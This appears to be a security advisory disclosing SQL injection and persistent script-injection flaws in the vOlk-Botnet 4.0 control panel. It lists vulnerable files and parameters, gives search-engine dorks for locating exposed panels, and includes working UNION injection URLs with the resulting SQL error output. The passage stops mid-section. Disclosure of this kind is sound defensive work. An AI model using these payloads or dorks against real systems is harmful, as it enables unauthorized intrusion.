Details: 1.1 The vulnerability laboratory research team discovered multiple sql injection vulnerabilities in the vOlk-Botnet framework application v4.0 private edition. The sql vulnerabilities allow remote attackers to inject/execute own sql commands/statements on the affected vOlks botnet application control panel dbms. The vulnerabilities are located in the Messenger, Filezilla, Estadisticas files with the bound vulnerable ?pag listing parameter. The vulnerability can be exploited by remote attackers without required user inter action. Successful exploitation of the vulnerabilities result in botnet control panel compromise via remote sql injection attack. Vulnerable Files(s): [+] Messenger.php [+] Filezilla.php [+] Estadisticas.php Vulnerable Parameter(s): [+] pag 1.2 The vulnerability laboratory research team discovered multiple persistent web vulnerabilities in the vOlk-Botnet framework application v4.0 private edition. The input validation vulnerabilities allow remote attackers to inject own malicious persistent script code on application side of the botnet framework. The vulnerabilities are located in the Visit Webpage (Open URL), MSN Stealer, Download File and Setting modules with the bound vulnerable domin, Pasw, https or messenger bot s name parameters. The vulnerability can be exploited by remote attacker with low or medium required user inter action. Successful exploitation of the vulnerabilities result in botnet control panel compromise via session hijacking, persistent web context manipulation or combined csrf request manipulation. Vulnerable Module(s): [+] MSN Stealer [+] Visit Webpage (Open URL) [+] Download File [+] Setting Vulnerable Parameter(s): [+] Name - Bot s Name [+] URL - Open URL Bots [+] URL - Download url [+] Password Administrator User Administrator Dork CodeSearch: pfont color=``#FF`` face=``Tahoma`` size=``1``vOlk-Botnet 4.0/font/p`` or ``title[vOlk-Botnet]v 4.0 Login/title`` DorK Google: allinurl:vOlk-Botnet 4.0or subtitle:[byvOlk] - WebAdmin Panel ® vOlk-Botnet 4.0and allinurl:WebAdmin/archivos/imagen/logo.jpg Proof of Concept: = 1.1 The sql injection vulnerabilities can be exploited by remote attacker without privileged application user account and without required user inter action. For demonstration or reproduce ... http://[SERVER]/images/WebAdmin/Controladores/Messenger.php?pag=-1%27%20union all select id from pharming-- http://[SERVER]/images/WebAdmin/Controladores/Filezilla.php?pag=-1%27%20union all select id from pharming-- http://[SERVER]/images/WebAdmin/Vistas/Estadisticas.php?pais=-1%27%20union all select id from pharming-- --- SQL Exceptions --- Sentencia Incorrecta : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-100 , 100' at line 1 --- Sentencia Incorrecta : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''-1'' ORDER BY fecha DESC LIMIT 0 , 45' at line 1 --- Sentencia Incorrecta : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-200 , 100' at line 1 -- SELECT * FROM zombis SELECT * FROM pharming 1.2 The persistent script code inject vulnerabilities can be exploited by remote attackers without privileged application user account but with low or medium required user inter action. For